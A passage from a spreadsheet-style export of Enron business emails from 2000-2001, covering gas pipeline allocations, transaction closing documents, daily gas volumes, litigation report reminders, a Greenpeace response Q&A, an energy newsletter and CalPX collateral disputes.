&lt;gcvenz@duke-energy.com&gt;, "'jtracy@coral-energy.com'" _x000D_
&lt;jtracy@coral-energy.com&gt;, "'cbulf@oneok.com'" &lt;cbulf@oneok.com&gt;_x000D_
cc: "'suyen@cook-inlet.com'" &lt;suyen@cook-inlet.com&gt;, "'wonmi@cook-inlet.com'" _x000D_
&lt;wonmi@cook-inlet.com&gt;, "Lorenz, Lad - TPLPL" &lt;LLorenz@socalgas.com&gt;, "Reid, _x000D_
Mary - TP5MAD" &lt;MReid@socalgas.com&gt; _x000D_
Subject: El Paso FERC Order regarding Topock Allocation_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Acquiring Shippers, _x000D_
_x000D_
The attached memo discusses the impact of the Topock allocation on your _x000D_
rights as acquiring shippers.? Please read the memo and give me a call (213 _x000D_
244-3832) if I can be of further assistance.? Have a Great Thanksgiving._x000D_
_x000D_
??????? ??????? ??????? ??????? ??????? ??????? ??????? ??????? Thanks,? Bob _x000D_
Betonte _x000D_
_x000D_
 &lt;&lt;AcqShipper.doc&gt;&gt; _x000D_
_x000D_
_x000D_
 - AcqShipper.doc_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 15:59:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'r..pena@enron.com'})</t>
  </si>
  <si>
    <t>_x000D_
Hi Barry,_x000D_
_x000D_
I brought down your Tour Championship tickets and you were not there.  I hope they are still then when you get in.  If not, let me know._x000D_
_x000D_
Thanks,_x000D_
Laura R. Pena_x000D_
Enron_x000D_
Event Coordinator_x000D_
713.853.5376 (phone)_x000D_
713.594.4512 (cell)_x000D_
713.646.5800 (fax)</t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 14:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'murielmcfarling@akllp.com'})</t>
  </si>
  <si>
    <t>frozenset({'tellwood@mayerbrown.com', 'schottla@us.cibc.com', 'jlawler@wilmingtontrust.com', 'mark.wolf@us.cibc.com', 'aroberts@wilmingtontrust.com', 'tamullen@prickett.com', 'charles.delacey@enron.com', 'annmarie.tiller@enron.com', 'alan.quaintance@enron.com', 'mniebruegge@mayerbrown.com', 'kenton@rlf.com', 'angela.davis@enron.com', 'brent.vasconcellos@enron.com', 'sara.shackleton@enron.com', 'brenda.l.funk@enron.com', 'gareth.bahlmann@enron.com', 'mercedes.arango@us.cibc.com', 'lkao@mayerbrown.com', 'bill.bowes@enron.com', 'trushar.patel@enron.com', 'gina.karathanos@enron.com'})</t>
  </si>
  <si>
    <t>Hawaii I Documents (Word)</t>
  </si>
  <si>
    <t>Attached, in Word Perfect format, are the closing documents for the_x000D_
Hawaii I transaction. Each of the documents has been marked to show_x000D_
changes from the prior version, with the following exceptions (i) most_x000D_
of the documents related to the Danno B rollover are marked against the_x000D_
original Danno B documents and (ii) the Series Danno B Certificate is_x000D_
marked against the replacement certificate for Series McGarret A._x000D_
_x000D_
The documents are identified as follows:_x000D_
_x000D_
Closing Checklist (266235)_x000D_
_x000D_
Trust Agreement (266236)_x000D_
_x000D_
Beneficial Interest Certificate (266242)_x000D_
_x000D_
Distribution Agreement (266243)_x000D_
_x000D_
Subscription Documents (266245)_x000D_
_x000D_
Ex. H, to Facility Agmt (Transfer and Auction) (266256)_x000D_
_x000D_
Ex. I, Part A to Facility Agmt (Asset LLC Agmt) (266270)_x000D_
_x000D_
Ex. I, Part B to Facility Agmt (Transferor LLC Agmt) (266276)_x000D_
_x000D_
Omnibus Amendment (Danno B) (267271)_x000D_
_x000D_
Series Certificate (267069)_x000D_
_x000D_
Series Supplement (267237)_x000D_
_x000D_
Drawdown Request (267252)_x000D_
_x000D_
Put Assignment (267264)_x000D_
_x000D_
Notice of Put Asgnmt (267266)_x000D_
_x000D_
B Interest Asgnmt (267267)_x000D_
_x000D_
Receipt of Transferor (267313)_x000D_
_x000D_
Receipt of Trust (267321)_x000D_
_x000D_
Transfer and Auction Agmt (267322)_x000D_
_x000D_
Direction Ltr to Owner Trustee of Hawaii Trust (267371)_x000D_
_x000D_
Notice of Prepayment (267365)_x000D_
_x000D_
Receipt of Agent (267366)_x000D_
_x000D_
Direction Ltr to Owner Trustee of Hawaii I Trust (267358)_x000D_
_x000D_
 - 266235.doc_x000D_
 - 266236.doc_x000D_
 - 266242.doc_x000D_
 - 266243.doc_x000D_
 - 266245.doc_x000D_
 - 266256.doc_x000D_
 - 266270.doc_x000D_
 - 266276.doc_x000D_
 - 267069.doc_x000D_
 - 267237.doc_x000D_
 - 267252.doc_x000D_
 - 267264.doc_x000D_
 - 267266.doc_x000D_
 - 267267.doc_x000D_
 - 267271.doc_x000D_
 - 267313.doc_x000D_
 - 267321.doc_x000D_
 - 267322.doc_x000D_
 - 267358.doc_x000D_
 - 267365.doc_x000D_
 - 267366.doc_x000D_
 - 267371.doc_x000D_
 - 268701.doc_x000D_
 - 267267.doc</t>
  </si>
  <si>
    <t>Thu, 2 Mar 2000 01:55:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Southern Cone Financial Master Agreements Schedule</t>
  </si>
  <si>
    <t xml:space="preserve">Mike who is the country manager would like to you send future updates to the _x000D_
distribution group labeled "Argentina Commercial Staff".  You would also have _x000D_
to copy Sami Arap and Don Black since they are in Sao Paulo.  Thanks for your _x000D_
help on this._x000D_
Brent_x000D_
---------------------- Forwarded by Brent Hendry/ENRON_DEVELOPMENT on _x000D_
02/03/2000 09:34 AM ---------------------------_x000D_
   _x000D_
	Enron International_x000D_
	_x000D_
	From:  Michael Guerriero                           02/03/2000 10:24 AM_x000D_
	_x000D_
_x000D_
To: Brent Hendry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
Subject: Southern Cone Financial Master Agreements Schedule_x000D_
_x000D_
If we are going to go with this distribution program let them know to use _x000D_
the  Argentina Commercial Staff  e-mail group address that will automatically _x000D_
updated the people from my team that should be getting the information._x000D_
_x000D_
Thanks_x000D_
_x000D_
MFG _x000D_
---------------------- Forwarded by Michael Guerriero/ENRON_DEVELOPMENT on _x000D_
03/02/2000 07:21 AM ---------------------------_x000D_
_x000D_
_x000D_
Rodolfo Freyre_x000D_
03/01/2000 05:31 PM_x000D_
To: Michael Guerriero/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Southern Cone Financial Master Agreements Schedule_x000D_
_x000D_
_x000D_
FYI._x000D_
---------------------- Forwarded by Rodolfo Freyre/ENRON_DEVELOPMENT on _x000D_
03/01/2000 05:31 PM ---------------------------_x000D_
_x000D_
_x000D_
Susan Bailey@ECT_x000D_
02/29/2000 05:05 PM_x000D_
To: Sami Arap/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Pablo _x000D_
Acevedo/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Bernardo _x000D_
Andrews/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Gabriela _x000D_
Aguilar/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Federico _x000D_
Cerisoli/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Rodolfo _x000D_
Freyre/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Julian _x000D_
Poole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, John J _x000D_
Shoobridge/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Don _x000D_
Black/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc:  _x000D_
_x000D_
Subject: Southern Cone Financial Master Agreements Schedule_x000D_
_x000D_
All,_x000D_
_x000D_
Sara Shackleton has asked that you all be included on our monthly _x000D_
distribution of the captioned Schedule.  This Schedule is distributed via _x000D_
e:mail on the first of every month and sets forth the status of financial _x000D_
master agreements in Argentina and Brazil.  _x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 09:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CES Daily March Requirements for 3/28 and after</t>
  </si>
  <si>
    <t xml:space="preserve">My fault.  I should have sent this out this morning._x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 03/28/2000 05:50 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
dkinney@columbiaenergygroup.com on 03/28/2000 08:43:05 AM_x000D_
To: " - *Kevin.Ruscitti@enron.com" &lt;Kevin.Ruscitti@enron.com&gt;, " - _x000D_
*chris.germany@enron.com" &lt;chris.germany@enron.com&gt;_x000D_
cc: " - *cfrankl2@enron.com" &lt;cfrankl2@enron.com&gt;, " - _x000D_
*joan.veselack@enron.com" &lt;joan.veselack@enron.com&gt;, " - *vversen@enron.com" _x000D_
&lt;vversen@enron.com&gt;, " - *cindy.vachuska@enron.com" _x000D_
&lt;cindy.vachuska@enron.com&gt;, " - *cora_pendergrass@enron.com" _x000D_
&lt;cora_pendergrass@enron.com&gt;, " - *mmitche2@enron.com" &lt;mmitche2@enron.com&gt;, _x000D_
" - *scott.goodell@enron.com" &lt;scott.goodell@enron.com&gt;, " - _x000D_
*steve.gillespie@enron.com" &lt;steve.gillespie@enron.com&gt;, " - _x000D_
*cgarcia@enron.com" &lt;cgarcia@enron.com&gt;, " - *despey@enron.com" _x000D_
&lt;despey@enron.com&gt;, " - *joann.collins@enron.com" &lt;joann.collins@enron.com&gt; _x000D_
Subject: CES Daily March Requirements for 3/28 and after_x000D_
_x000D_
_x000D_
The attached file contains our daily volume requirements for_x000D_
and          .    There are two worksheets:  The one labelled with today's _x000D_
date_x000D_
contains the volumes that we need at each of the delivery points indicated._x000D_
The schedulers will want to check this sheet to see how much gas is needed at _x000D_
a_x000D_
specific point._x000D_
_x000D_
The sheet labelled 'Daily Change' shows the change (increase +/decrease -) in_x000D_
the requested daily volume relative to a prior value.  For the current gas _x000D_
day,_x000D_
the change is an intra-day change and is calculated using the previous day's_x000D_
volume request for the current day (e.g., If the current gas day is 3/28, then_x000D_
the change is computed with respect to the 3/27 request for 3/28).  For_x000D_
tomorrow's gas day and any subsequent ones shown, the change is computed using_x000D_
the First-of-the-month volumes requested for those days.  (e.g., If today is_x000D_
3/28, then the change for 3/29, 3/30, etc. is computed with respect to the_x000D_
first-of-the-month volumes for those days.)   This sheet should be useful in_x000D_
determining prices for daily changes in gas volumes that we take or turn back._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Doug Kinney_x000D_
Ph:  703-561-6339_x000D_
Fax:  703-561-7317_x000D_
_x000D_
 - 03-28-00 daily vols AM.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 03:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HFD Screening Committee AT&amp;T Conf. Call</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Lisa Connolly/NA/Enron on 03/13/2001 _x000D_
10:53 AM ---------------------------_x000D_
From: Sherri Sera on 03/13/2001 11:04 AM_x000D_
To: Lisa Connolly/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: HFD Screening Committee AT&amp;T Conf. Call_x000D_
_x000D_
9:30a (CST), Wednesday, March 14_x000D_
Dial-in: 1.800.260.0719_x000D_
Passcode: 543216_x000D_
Host: Jeff Skilling_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Apr 2001 02:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'schneider_michael@jpmorgan.com'})</t>
  </si>
  <si>
    <t>JPM's commission schedule</t>
  </si>
  <si>
    <t>Sara-_x000D_
Just in case Tom didn't have a chance to email to you prior to leaving for his_x000D_
vacation, I've enclosed the commission schedule.   I've priced equities, fixed_x000D_
income and commodity products.  Please let me know if you have any questions._x000D_
Regards,_x000D_
Mike_x000D_
_x000D_
(See attached file: Enron Comm 4-01.xls)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael C Schneider_x000D_
02/26/2001 03:47 PM_x000D_
_x000D_
To:   sara.shackleton@enron.com_x000D_
cc:   Corinne A Samon@JPMORGAN_x000D_
Subject:  JPM's interest schedule_x000D_
_x000D_
Sara-_x000D_
Per your conversation with Corinne, please find enclosed JPM's interest rate_x000D_
schedule.   Pls do not hesitate to call me at (212) 648-1164 if you have any_x000D_
questions or require any other information._x000D_
Regards,_x000D_
Mike (NA Technology &amp; Clearing Sales)_x000D_
_x000D_
_x000D_
(See attached file: Enron Int Schedule 2-01.xls)_x000D_
_x000D_
_x000D_
_x000D_
 - Enron Comm 4-01.xls_x000D_
 - Enron Int Schedule 2-01.xls</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 10:18:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joanne.rozycki@enron.com'})</t>
  </si>
  <si>
    <t>new file</t>
  </si>
  <si>
    <t>Monument Derivatives GIVE UP to GS&amp;Co._x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 09:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: REMINDER: Weekly Significant Litigation Report</t>
  </si>
  <si>
    <t xml:space="preserve">no comments.  thanks. DF_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
01/11/2000 12:24 PM_x000D_
To: Philip Crowley/ET&amp;S/Enron@ENRON, Drew Fossum/ET&amp;S/Enron@ENRON, Kathy _x000D_
Ringblom/ET&amp;S/Enron@ENRON, Louis Soldano/ET&amp;S/Enron@ENRON_x000D_
cc: Maxine Smith/ET&amp;S/Enron@ENRON, Martha Benner/ET&amp;S/Enron@ENRON, Ann _x000D_
Smith/ET&amp;S/Enron@ENRON, Jan Cobden/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: REMINDER: Weekly Significant Litigation Report_x000D_
_x000D_
If you have comments to the weekly report, please forward them to me asap.  _x000D_
If you do not have comments, please let me know so that I can make a note of _x000D_
it.  Thanks!_x000D_
_x000D_
---------------------- Forwarded by Denise LaGesse/ET&amp;S/Enron on 01/11/2000 _x000D_
12:17 PM ---------------------------_x000D_
_x000D_
_x000D_
DENISE LAGESSE_x000D_
01/07/2000 02:40 PM_x000D_
To: Eric Benson/ET&amp;S/Enron@ENRON, Janet Butler/ET&amp;S/Enron@ENRON, Jan _x000D_
Cobden/ET&amp;S/Enron@ENRON, Janet Cones/FGT/Enron@ENRON, Shelley _x000D_
Corman/ET&amp;S/Enron@ENRON, Philip Crowley/ET&amp;S/Enron@ENRON, Theresa _x000D_
Hess/ET&amp;S/Enron@ENRON, Staci Holtzman/FGT/Enron@ENRON, Tamara _x000D_
Hopkins/ET&amp;S/Enron@ENRON, Lee Huber/ET&amp;S/Enron@ENRON, Frazier _x000D_
King/FGT/Enron@ENRON, Candace Kyle/ET&amp;S/Enron@ENRON, Ruth _x000D_
Mann/ET&amp;S/Enron@ENRON, Dorothy McCoppin/FGT/Enron@ENRON, Michael _x000D_
Moran/ET&amp;S/Enron@ENRON, Peggy Phillips/FGT/Enron@ENRON, Tony _x000D_
Pryor/ET&amp;S/Enron@ENRON, Colleen Raker/ET&amp;S/Enron@ENRON, Bret _x000D_
Reich/ET&amp;S/Enron@ENRON, Susan Scott/ET&amp;S/Enron@ENRON, Emily _x000D_
Sellers/ET&amp;S/Enron@ENRON, Maxine Smith/ET&amp;S/Enron@ENRON, Louis _x000D_
Soldano/ET&amp;S/Enron@ENRON, Kim Wilkie/ET&amp;S/Enron@ENRON, Martha _x000D_
Benner/ET&amp;S/Enron@ENRON, Dari Dornan/ET&amp;S/Enron@ENRON, Drew _x000D_
Fossum/ET&amp;S/Enron@ENRON, Maria Pavlou/ET&amp;S/Enron@ENRON, Kathy _x000D_
Ringblom/ET&amp;S/Enron@ENRON, Ann Smith/ET&amp;S/Enron@ENRON, Jim _x000D_
Talcott/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Weekly Significant Litigation Report_x000D_
_x000D_
Attached is the Weekly Significant Litigation Report for the week of Dec. _x000D_
20.  Please add your comments for this week_x000D_
and last week, and submit them to me by EOB Monday, Jan. 10._x000D_
_x000D_
If you have received this e-mail in error, please disregard; I'd rather _x000D_
include everyonethan risk omitting someone.   Thanks very much!  :)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jackie.gentle@enron.com', 'peter.styles@enron.com', 'kelly.kimberly@enron.com', 'mark.palmer@enron.com', 'catherine.mckalip-thompson@enron.com', 'steven.kean@enron.com', 'kate.bauer@enron.com', 'michael.terraso@enron.com'})</t>
  </si>
  <si>
    <t>Q&amp;A - Talking Points on Greenpeace letter</t>
  </si>
  <si>
    <t>Attached are draft Q&amp;A on Enron's response to the Greenpeace letter on _x000D_
climate change.   This document should be for close distribution to those of _x000D_
us in Enron Corp and Enron Europe who could potentially get questions on our _x000D_
response.  More general taking points for use by employees will be developed _x000D_
for distribution to a wider internal audience._x000D_
_x000D_
I would suggest that any detailed questions be referred to me so that we are _x000D_
able to closely control the messages consistent with our Corporate _x000D_
statement/strategy on climate.  If questions specific to Enron Europe come _x000D_
up, they should be referred to PR (Jackie/Kate) in London or Peter Styles in _x000D_
Brussels, who will coordinate closely with me._x000D_
_x000D_
Please review this document and make suggested changes and additions as soon _x000D_
as possible, as the letter has already been sent to Greenpeace (signed by _x000D_
Kelly and Mike on 4/30)._x000D_
_x000D_
Thanks!_x000D_
_x000D_
_x000D_
_x000D_
Jeffrey Keeler_x000D_
Director, Environmental Strategies_x000D_
Enron_x000D_
Washington DC office - (202) 466-9157_x000D_
Cell Phone (203) 464-1541</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 03:02:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gary.r.hayward@fsa.gov.uk', 'michael.lord@fsa.gov.uk'})</t>
  </si>
  <si>
    <t>New fax received (Likely sender: ).</t>
  </si>
  <si>
    <t xml:space="preserve">Gary/Michael_x000D_
_x000D_
I am pleased to attach for your review the opinion of Linklaters you _x000D_
requested addressing the question of whether EnronOnline's activities _x000D_
constitute "arranging" under the FSA 1986.  Kindly acknowledge receipt._x000D_
_x000D_
I trust this meets your requirements and look forward to receiving your _x000D_
confirmation of this at your earliest convenience.  Many thanks._x000D_
_x000D_
With best regards_x000D_
_x000D_
Paul  (tel -  7783 6566)_x000D_
---------------------- Forwarded by Paul Simons/LON/ECT on 27/07/2000 09:54 _x000D_
---------------------------_x000D_
_x000D_
_x000D_
London Fax System_x000D_
27/07/2000 09:47_x000D_
To: Paul Simons/LON/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: New fax received (Likely sender: )._x000D_
_x000D_
_x000D_
You have received a new fax from _x000D_
_x000D_
The image contains 4 page(s)._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 03:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>caledonia model</t>
  </si>
  <si>
    <t>A few minor changes are represented here.</t>
  </si>
  <si>
    <t>Wed, 20 Dec 2000 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eric.wardle@enron.com'})</t>
  </si>
  <si>
    <t>Revised Brazos Transaction Agreement attached</t>
  </si>
  <si>
    <t>Use this one please.</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 00:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Yeah - I pretty much became part of the furniture yesterday as I recouped _x000D_
from the brutality of that weekend. I ended up at a random friend's house at _x000D_
about 4 a.m., then proceeded to down a couple beers and head for bed at about _x000D_
6:30. I could not believe it when my alarm went off this morning - it's a _x000D_
cruel, cruel world when you've got a social schedule like ours. But I _x000D_
definitely had a good time Saturday, despite the fact that I was ditched by _x000D_
my ride and locked out of my house, which is never fun after a dozen _x000D_
cocktails. All in all, though, great party.</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 02:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'walter.guidroz@enron.com', 'tana.jones@enron.com', 'karen.lambert@enron.com', 'kelly.lombardi@enron.com', 'tom.moran@enron.com'})</t>
  </si>
  <si>
    <t>IMPT!!!!! Profile Manager - INTERNAL PRODUCT TYPES</t>
  </si>
  <si>
    <t xml:space="preserve">There is a system issue that came up today with the Internal Product Types.  _x000D_
In the review process, if you set the Internal Product Types to "None", _x000D_
counterparties are still able to read the products.   To prevent this from _x000D_
happening on future reviews, I recommend the following:_x000D_
_x000D_
New Counterparties_x000D_
I will pull the counterparty into Datamanager and set the profile to "Read" _x000D_
for everything and delete the Internal and ZZ Product Types_x000D_
Credit should continue to review for the specific commodity requested for _x000D_
Trade _x000D_
Legal/Contracts should only review the product types that Credit has selected _x000D_
for Trade.  The remaining product types are already set to Read with the _x000D_
exception of the Internal and ZZ Product Types._x000D_
_x000D_
Amended Counterparties_x000D_
Initial group will amend product types - excluding the Internal and ZZ _x000D_
product types_x000D_
Other groups updating the work queue - Please make sure to exclude the _x000D_
Internal and ZZ product types in your review._x000D_
_x000D_
This is short term - Once we release the new version of Profile Manager - _x000D_
Internal Product Types will not be included in your reviews. _x000D_
_x000D_
We appreciate your cooperation with this request.  Please let me know if you _x000D_
have any questions. </t>
  </si>
  <si>
    <t>Wed, 7 Nov 2001 15:19:56 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09 =09    Dear Eric,  The National Coal Council holds its annual fall mee=_x000D_
ting in Washington.  Council members will discuss emissions issues with rep=_x000D_
resentatives from the EPA and the Department of Energy.  The group will als=_x000D_
o present their latest policy recommendations to the DOE on Thursday.      =_x000D_
 The Senate Environment and Public Works Committee is holding a markup hear=_x000D_
ing on Thursday.  Committee Chairman  Jim Jeffords (I-VT) is marking severa=_x000D_
l important bills including legislation from Senator James Inhofe (R-OK) de=_x000D_
aling with nuclear security.  The Washington bureau will be following the h=_x000D_
earing tomorrow.   Finally, the Washington bureau will bring us more reacti=_x000D_
on from Wednesday's FERC meeting. We'll hear from Megawatt Daily's Michael =_x000D_
Lustig on the new RTO deadlines, and former FERC Commissioner Branko Terzic=_x000D_
 will give us insight into a Deloitte &amp; Touche study looking at consumer vi=_x000D_
ews on deregulation.  Join us from the Washington bureau on Thursday.   The=_x000D_
 Houston bureau will continue to follow developments surrounding Enron.  Jo=_x000D_
in us on Wednesday for the latest Enron update.     The Rainbow/PUSH Coalit=_x000D_
ion is holding an energy conference on November 12 - 13.  On Thursday from =_x000D_
the Houston bureau,  William-Paul Thomas of Rainbow/PUSH will bring us deta=_x000D_
ils on the participants and companies slated to attend the event.  Join us =_x000D_
during the noon ET newscast to catch the Thomas interview.   Also from Hous=_x000D_
ton,  Paul Frison, CEO of Houston Technology Center will stop by during the=_x000D_
 4:00 p.m. ET newscast.  He'll discuss HTC's recent alliance with several b=_x000D_
ig name energy companies to address technical challenges the energy industr=_x000D_
y is facing.  Log on for the scoop from the Houston bureau tomorrow.   Exec=_x000D_
utive Director of the Independent Energy Producers Association Jan Smutny-J=_x000D_
ones talks to West Coast Bureau Correspondent Kym McNicholas about the FERC=_x000D_
 order on creditworthiness issues.  Kym says there may also be reaction fro=_x000D_
m California ISO.  Catch these reports from the West Coast bureau.   C.H. G=_x000D_
uernsey &amp; Company Attorney Jeremy Oller will talk with us from Oklahoma Cit=_x000D_
y on Thursday.  During the 3:00 p.m. ET newscast Oller is discussing the cu=_x000D_
rrent trend showing legislatures pulling back from electric power deregulat=_x000D_
ion.   Keep in mind things are subject to change at a moment's notice. Occa=_x000D_
sionally guests have to cancel or change time slots.  We'll continue to do =_x000D_
our best to keep you updated on future interviews and events.    Be sure to=_x000D_
 watch our newscasts every business day - 9 a.m. to 5 p.m. ET, at the top o=_x000D_
f each hour.  =09 =09=09=09=09_x000D_
 =09=09=09=09=09=09 =09_x000D_
=09 =09Jay Rickerts, EnergyNewsLive.com Anchor  View today's Energy Wrap Vi=_x000D_
deo Windows Media Player: 56K  |  100K  |  300K  Real Player: 56K  |  100K =_x000D_
 |  300K  (Requires Windows Media Player or Real Player )   Experience all =_x000D_
that Williams Energy News Live has to offer!   If you are receiving this le=_x000D_
tter for the first time and wish to continue, subscribe now    To stop rece=_x000D_
iving this letter, unsubscribe now    If you are having trouble receiving t=_x000D_
his e-mail, please let us know  or  call (800) WILLIAMS (800-945-5426) week=_x000D_
days, 7am-7pm CST.    Comments? Suggestions? Let us  know  or  call (800) W=_x000D_
ILLIAMS (800-945-5426) weekdays, 7am-7pm CST.    Copyright 2001 Williams En=_x000D_
ergy News Live, LLC. All  Rights Reserved.  =09=09=09=09=09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Feb 2001 05:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'daniel.diamond@enron.com'})</t>
  </si>
  <si>
    <t>Re: Paris</t>
  </si>
  <si>
    <t xml:space="preserve">Cool.  They sell their music CD's at the front desk.  They may even have two _x000D_
out.  Would you mind picking them up for me?  I'll pay you back, I promise.  _x000D_
If you have time, check out the gym/pool/message in the basement of the _x000D_
hotel--it's great.  Also try to get a room overlooking the interior _x000D_
courtyard, and don't change money at the hotel--they'll bend you as only the _x000D_
french can. _x000D_
Have a great time.....and definitely hang out in the lounge of the hotel._x000D_
Jeff._x000D_
_x000D_
PS, would you mind swinging over to the Hermes and pick me up a _x000D_
briefcase?--they're about $5,000 or so.  Great, thanks. _x000D_
_x000D_
_x000D_
_x000D_
	Daniel Diamond_x000D_
	02/22/2001 12:42 PM_x000D_
		_x000D_
		 To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Re: Paris_x000D_
_x000D_
Hotel Costes here I come!_x000D_
</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 22:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: FW: Collateral Notification - EPMI</t>
  </si>
  <si>
    <t xml:space="preserve">I am on board. If the PX comes back again, I will call their in-house attys._x000D_
_x000D_
_x000D_
_x000D_
	Christian Yoder/ENRON@enronXgate_x000D_
	06/04/2001 05:54 PM_x000D_
		 _x000D_
		 To: Elizabeth Sager/HOU/ECT@ECT, Richard B Sanders/HOU/ECT@ECT_x000D_
		 cc: Tracy Ngo/ENRON@enronXgate_x000D_
		 Subject: FW: Collateral Notification - EPMI_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Ngo, Tracy  _x000D_
Sent: Thursday, May 31, 2001 4:49 PM_x000D_
To: Yoder, Christian_x000D_
Subject: RE: Collateral Notification - EPMI_x000D_
_x000D_
Can you pass this along to Elizabeth to ensure Sanders is on board as well?  _x000D_
We are renewing our L/C's on a month to month basis for the PX per Sanders.  _x000D_
However, the request below is to "replenish" the CASH that was drawn _x000D_
down...please advise._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Yoder, Christian  _x000D_
Sent: Thursday, May 31, 2001 4:48 PM_x000D_
To: O'Neil, Murray P._x000D_
Cc: Hall, Steve C.; Ngo, Tracy_x000D_
Subject: RE: Collateral Notification - EPMI_x000D_
_x000D_
I agree with Steve's position stated in his separate e'mail.  Don't give _x000D_
these guys a penny.----cgy_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  O'Neil, Murray P.  _x000D_
Sent: Thursday, May 31, 2001 2:45 PM_x000D_
To: Ngo, Tracy_x000D_
Cc: Hall, Steve C.; Yoder, Christian_x000D_
Subject: FW: Collateral Notification - EPMI_x000D_
_x000D_
_x000D_
_x000D_
Tracy,  Do we have concerns here.  We pointed out to the PX that there was _x000D_
excess credit.  By using collateral to pay these bills are we not keeping _x000D_
required levels available?_x000D_
_x000D_
MO_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  &lt;Don_Deach@calpx.com &lt;mailto:Don_Deach@calpx.com&gt;&gt;@ENRON _x000D_
[mailto:IMCEANOTES-+3CDon+5FDeach+40calpx+2Ecom+3E+40ENRON@ENRON.com] _x000D_
&lt;mailto:[mailto:IMCEANOTES-+3CDon+5FDeach+40calpx+2Ecom+3E+40ENRON@ENRON.com]&gt;_x000D_
 _x000D_
Sent: Thursday, May 31, 2001 2:41 PM_x000D_
To: EPMI@calpx.com &lt;mailto:EPMI@calpx.com&gt;; BFM-EPMI@calpx.com _x000D_
&lt;mailto:BFM-EPMI@calpx.com&gt;_x000D_
Cc: Lynn_Miller@calpx.com &lt;mailto:Lynn_Miller@calpx.com&gt;; _x000D_
Susan_D_Rossi@calpx.com &lt;mailto:Susan_D_Rossi@calpx.com&gt;; _x000D_
Lisa_G_Urick@calpx.com &lt;mailto:Lisa_G_Urick@calpx.com&gt;; _x000D_
Clark_R_Cheng@calpx.com &lt;mailto:Clark_R_Cheng@calpx.com&gt;_x000D_
Subject: Collateral Notification - EPMI_x000D_
_x000D_
Participant:_x000D_
_x000D_
Pursuant  to  your  written  request  and  in  accordance  with  the _x000D_
Preliminary_x000D_
Injunction  issued on March 5, 2001 by the Court in Enron Power Marketing, _x000D_
Inc.,_x000D_
et  al.  v.  California  Power Exchange Corporation, USDC Case No. 01-00901, _x000D_
the_x000D_
California Power Exchange Corporation (CalPX) applied cash collateral _x000D_
maintained_x000D_
by Enron Power Marketing, Inc. in payment of the following invoices:_x000D_
_x000D_
          Dec RT F   $ 15,297.24_x000D_
                Jan RT P    $ 64,547.04_x000D_
                Jan RT F    $   2,255.74_x000D_
